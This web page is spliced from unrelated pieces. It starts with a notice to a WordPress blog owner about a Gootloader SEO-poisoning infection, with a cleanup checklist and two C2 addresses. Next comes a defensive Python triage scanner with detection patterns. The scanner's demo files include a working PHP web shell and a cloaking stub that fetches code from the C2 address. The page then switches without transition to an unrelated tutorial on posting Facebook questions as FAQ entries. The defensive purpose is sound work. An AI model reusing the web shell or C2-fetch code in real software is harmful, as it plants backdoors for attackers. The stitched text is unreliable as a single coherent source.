Dear blog owner and visitors,
This blog had been infected to serve up Gootloader malware to Google search victims, via a common tactic known as SEO (Search Engine Optimization) poisoning. Your blog was serving up 374 malicious pages. Your blog served up malware to 57 visitors.
I tried my best to clean up the infection, but I would do the following:
- Upgrade WordPress to the latest version (one way the attackers might have gained access to your server)
- Upgrade all WordPress themes to the latest versions (another way the attackers might have gained access to your server)
- Upgrade all WordPress plugins (another way the attackers might have gained access to your server), and remove any unnecessary plugins.
- Verify all users are valid (in case the attackers left a backup account, to get back in)
- Change all passwords (for WordPress accounts, FTP, SSH, database, etc.) and keys. This is probably how the attackers got in, as they are known to brute force weak passwords
- Run antivirus scans on your server
- Block these IPs (22.214.171.124 and 126.96.36.199), either in your firewall, .htaccess file, or in your /etc/hosts file, as these are the attackers' command-and-control servers, which send malicious commands for your blog to execute
- Check cronjobs (both server and WordPress), aka scheduled tasks. This is a common method that an attacker will use to get back in. If you are not sure what this is, Google it
- Consider wiping the server completely, as you do not know how deep the infection is. If you decide not to, I recommend installing some security plugins for WordPress, to try and scan for any remaining malicious files. Integrity Checker, WordPress Core Integrity Checker, Sucuri Security, and Wordfence Security all do some level of detection, but not 100% guaranteed
- Go through the process for Google to recrawl your site, to remove the malicious links (to see what malicious pages there were, go to Google and search site:your_site.com agreement)
- Check subdomains, to see if they were infected as well
- Check file permissions
Gootloader (previously Gootkit) malware has been around since 2014, and is used to initially infect a system, and then sell that access off to other attackers, who then usually deploy additional malware, to include ransomware and banking trojans. By cleaning up your blog, it will make a dent in how they infect victims. PLEASE try to keep it up-to-date and secure, so this does not happen again.
The Internet Janitor
Below are some links to research/further explanation on Gootloader:
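The checklist in the notice above is the Janitor's; the script below is an added example, not code from the notice or its author, that automates the file-system items on that list (PHP in uploads, obfuscated or cloaking code, references to the two C2 addresses, world-writable files, files changed after the last core update). The indicator patterns, the one-hour mtime slack, and the sample tree built in demo_tree() are assumptions made for illustration; only the two IP addresses come from the notice.

```python
#!/usr/bin/env python3
"""Triage a WordPress document root for the indicators in the notice above.

Added example, not code from the notice or its author. The indicator
patterns, MTIME_SLACK and the constructed tree in demo_tree() are assumptions.
"""
import os
import re
import stat
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Addresses the notice names as the attackers' command-and-control servers.
C2_IPS = ("22.214.171.124", "126.96.36.199")

# Assumed indicators of injected PHP: eval/decode chains and the C2 addresses.
OBFUSCATION_RE = re.compile(
    rb"\b(eval|base64_decode|gzinflate|str_rot13|assert|create_function)\s*\(",
    re.IGNORECASE,
)
C2_RE = re.compile("|".join(re.escape(ip) for ip in C2_IPS).encode())
# Code that branches on the referer or user agent and mentions Google is the
# usual shape of search-engine cloaking (search visitors get other content).
CLOAK_RE = re.compile(rb"HTTP_(REFERER|USER_AGENT)", re.IGNORECASE)
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".php7"}
MTIME_SLACK = 3600  # seconds a file may be newer than the core baseline


def file_findings(path: Path, rel: Path, baseline: Optional[float]) -> List[str]:
    """Return the sorted indicator tags that apply to one file."""
    tags = []
    data = path.read_bytes()
    st = path.stat()
    if path.suffix.lower() in PHP_SUFFIXES and "uploads" in rel.parts:
        tags.append("php-in-uploads")        # uploads should never hold PHP
    if OBFUSCATION_RE.search(data):
        tags.append("obfuscated-php")
    if C2_RE.search(data):
        tags.append("c2-address")
    if CLOAK_RE.search(data) and b"google" in data.lower():
        tags.append("search-cloaking")
    if st.st_mode & stat.S_IWOTH:
        tags.append("world-writable")        # the "check file permissions" item
    if baseline is not None and st.st_mtime > baseline + MTIME_SLACK:
        tags.append("modified-after-core")   # newer than the last core update
    return sorted(tags)


def scan_tree(root) -> Dict[str, List[str]]:
    """Walk a WordPress root; map relative path -> tags for every flagged file.

    wp-includes/version.php serves as the baseline mtime: the core updater
    rewrites it, so files that are much newer were changed afterwards (by an
    admin, a plugin update, or an attacker) and deserve a look.
    """
    root = Path(root)
    core = root / "wp-includes" / "version.php"
    baseline = core.stat().st_mtime if core.exists() else None
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if not path.is_file():
                continue
            tags = file_findings(path, path.relative_to(root), baseline)
            if tags:
                report[path.relative_to(root).as_posix()] = tags
    return report


def demo_tree() -> str:
    """Build a constructed (sample) WordPress tree with two infected files."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    t_core = 1_700_000_000           # pretend the last core update ran then
    t_later = t_core + 86_400        # the attacker's files land a day later
    files = {
        "wp-includes/version.php": (b"<?php\n$wp_version = '6.5';\n", t_core, 0o644),
        "wp-content/themes/twentytwentyfour/functions.php": (
            b"<?php\nadd_action('wp_head', 'theme_head');\n", t_core, 0o644),
        # Theme file with an injected cloaking stub that pulls content from the C2.
        "wp-content/themes/twentytwentyfour/header.php": (
            b"<?php\nif (isset($_SERVER['HTTP_REFERER']) && "
            b"stripos($_SERVER['HTTP_REFERER'], 'google') !== false) {\n"
            b"    echo base64_decode(file_get_contents('http://22.214.171.124/cmd'));\n}\n",
            t_later, 0o644),
        # Web shell dropped into uploads and left world-writable.
        "wp-content/uploads/2023/cache.php": (
            b"<?php eval(base64_decode($_POST['c']));\n", t_later, 0o666),
    }
    for rel, (content, mtime, mode) in files.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(content)
        os.chmod(path, mode)
        os.utime(path, (mtime, mtime))
    return str(root)


if __name__ == "__main__":
    for rel, tags in sorted(scan_tree(demo_tree()).items()):
        print(f"{rel}: {', '.join(tags)}")
```

Point scan_tree() at the real document root instead of demo_tree(). Flagged files are leads, not verdicts: a legitimate plugin update also lands after the core baseline, so confirm core files with WP-CLI's `wp core verify-checksums` and diff themes and plugins against fresh copies from wordpress.org before deleting anything. Blocking the two addresses belongs in the firewall or .htaccess; /etc/hosts only maps names to addresses and does not stop a connection to a raw IP.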
We’ll walk through the process from start to finish using the one I’m currently posting as the example.
- Find the question you’re going to post. I’m starting out just typing in the word “question” in the search on our Facebook page to get a list of all posts that include the word.
- Open the link for the conversation that you’re going to add. I keep my search results in one tab and open the individual discussions in another one so I don’t have to keep repeating the searches or clicking to get to the oldest ones I can find.
- On this website, find the bar across the top of your browser window. Click New, then FAQ.
- Make sure you keep both windows open, because the next couple of steps will be going back and forth between here and Facebook. In the window where the post you’re adding is showing, highlight the actual question that’s being asked. It’s ok to copy more than one sentence, we’ll fix that in a later step. Right-click on the highlighted portion and click Copy.
- Back on the Add FAQ page, you want to make sure your cursor is in the box under Add New Post that says “Enter Title Here”, right-click with your mouse and click Paste. That puts the question you copied in the last step as the title.
- In the large text box that looks like a word processor window or email window, you want to type “View the discussion here.” Yes, it’s generic, but we aren’t duplicating effort. We’re just making it easier to find the posts in the Facebook group.
- Now we need to link the discussion from our page to this post. Go back to the Facebook post again. You need to select the address for the post from the browser’s address bar and copy it.
- Back on your Add FAQ window, you want to highlight the word “here” and click on the chain link icon on the toolbar. That will open the Add Link window.
- Put your cursor in the URL box and right-click > Paste to put in the address you copied from Facebook. Make sure that the box next to "Open link in a new window/tab" is selected, then click Add Link.
- Next is the Category. If the category this question belongs in is displayed in the FAQ Categories box on the right side of the screen, select it and you’re done with this step. If not, you need to add a new category. Click where it says “+ Add New Category”.
- Since the post I’m linking to is about Inclusions, that’s what I decided to name the category. Type the name into the text box and click “Add New FAQ Category”.
- Your category will appear in the list and be selected once it has been added. By now you may have noticed that the permalink to this post that displays under the title might be a little bit too long. That's because it takes the entire title to make it! We can fix that, though, and here's how. Click the "Edit" button at the end of the Permalink.
- Shorten the link by removing some of the words. I decided to make this one “copper-wire-color”. Remember that the only restriction is that you can’t use the same words in this field that are used for another FAQ item. When you’ve finished editing the link, click “Ok”.
- Look everything over to make sure you didn’t forget any steps, then click the Publish button and you’re done!